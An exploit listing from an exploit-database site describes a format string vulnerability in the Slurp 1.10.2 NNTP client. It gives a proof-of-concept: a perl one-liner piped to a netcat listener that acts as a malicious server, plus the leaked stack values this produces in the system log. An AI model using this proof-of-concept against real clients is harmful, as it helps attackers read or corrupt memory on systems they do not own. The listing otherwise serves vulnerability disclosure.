[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Slurp 1.10.2 Format String Vulnerability

Author
Milad karimi
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-37351
Category
local exploits
Date add
14-02-2022
Platform
linux
# Exploit Title: Slurp 1.10.2 - Remote Format String  Date: 2022-02-12

# Author: Milad Karimi

slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.

It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.

perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112


Then check /var/log/messages for something like:




slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'

#  0day.today [2024-11-16]  #